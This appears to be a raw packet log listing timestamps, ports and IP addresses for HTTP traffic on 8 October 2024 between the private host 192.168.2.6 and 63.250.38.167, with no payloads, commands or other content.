Oct 8, 2024 11:31:05.083571911 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083585978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083595991 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083607912 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083617926 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083628893 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083651066 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.083652020 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.083652020 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.083684921 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084156990 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084214926 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084239006 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084266901 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084302902 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084336042 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084340096 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084371090 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084407091 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084410906 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084450006 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084542036 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084552050 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084587097 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084614038 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084639072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084672928 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084707022 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084716082 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084742069 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084777117 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084777117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084810972 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084842920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084849119 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084878922 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.084908962 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.084914923 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085052967 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.085365057 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085499048 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085551977 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085556984 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.085587978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085622072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085656881 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085689068 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085701942 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.085701942 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.085722923 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085756063 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085771084 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.085789919 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085825920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.085843086 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.086313963 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086376905 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.086386919 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086421967 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086456060 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086488008 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086513996 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.086524010 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.086564064 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.138307095 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176104069 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176122904 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176136017 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176218987 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176237106 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176249027 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176259041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176261902 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176261902 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176270962 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176284075 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176295042 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176299095 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176306963 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176318884 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176328897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176340103 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176352024 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176363945 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176367998 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176367998 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176367998 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176395893 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176417112 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176678896 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176714897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176767111 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176816940 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176851034 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176883936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176917076 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176937103 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176937103 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176937103 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.176949978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.176985979 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177119017 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177148104 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177206039 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177258015 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177268982 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177292109 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177345037 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177370071 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177377939 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177431107 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177459002 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177464962 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177500963 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177536011 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.177680969 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177680969 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.177973032 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178009033 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178042889 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178076029 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178109884 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178141117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178174973 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178194046 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178194046 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178194046 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178211927 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178246975 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178278923 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178313017 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178344965 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178365946 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178365946 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178365946 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178378105 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178411961 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178447008 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178491116 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178491116 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.178908110 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178942919 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.178977966 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179009914 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179043055 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179049969 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.179059029 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.179075956 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179115057 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179147005 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179182053 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179215908 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179241896 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.179241896 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.179251909 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.179347992 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181551933 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181590080 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181629896 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181663036 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181695938 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181729078 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181755066 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181755066 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181766033 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181787968 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181797028 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181830883 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181864023 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181898117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181943893 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.181996107 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181996107 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.181996107 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269072056 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269100904 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269119978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269131899 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269144058 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269154072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269172907 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269182920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269201040 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269207954 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269207954 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269207954 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269212008 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269227028 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269237041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269243956 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269248962 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269256115 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269260883 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269273996 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269284964 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269295931 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269305944 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269316912 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269321918 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269321918 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269321918 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269328117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269340038 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269349098 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269359112 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269370079 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269380093 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269392014 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269402981 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269407988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269407988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269407988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269413948 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269424915 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269434929 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269447088 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269457102 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269464970 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269464970 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269464970 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269468069 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269480944 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269489050 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269490957 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269503117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269505978 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269516945 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269524097 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269568920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269706011 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269716024 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269726038 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269737005 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269752979 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269753933 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269753933 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269754887 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269763947 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269777060 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269778013 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269788980 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269800901 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269810915 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269825935 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269829988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269829988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269836903 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269856930 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269867897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269879103 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269905090 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269923925 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269934893 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269943953 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.269963026 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.269974947 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270015001 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270015001 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270057917 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270068884 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270078897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270088911 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270100117 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270109892 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270121098 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270128965 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270128965 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270148993 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270155907 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270181894 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270194054 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270204067 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270215034 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270226002 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270237923 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270247936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270256042 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270256042 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270256042 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270282030 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270297050 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270307064 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270317078 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270328045 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270338058 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270348072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270359993 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270369053 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270374060 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270374060 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270374060 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270380974 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270447969 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270447969 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.270873070 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270915031 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.270926952 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271017075 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271023989 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271028996 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271064043 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271091938 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271102905 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271115065 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271125078 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271135092 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271147013 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271157026 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271187067 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271187067 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271187067 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271222115 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271231890 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271241903 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271251917 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271260977 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271264076 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271280050 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271282911 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271296978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271297932 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271308899 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271320105 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271330118 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271342039 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271349907 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271351099 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271349907 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271364927 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.271378040 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.271409988 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.326303005 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361159086 CEST	80	49991	63.250.38.167	192.168.2.6
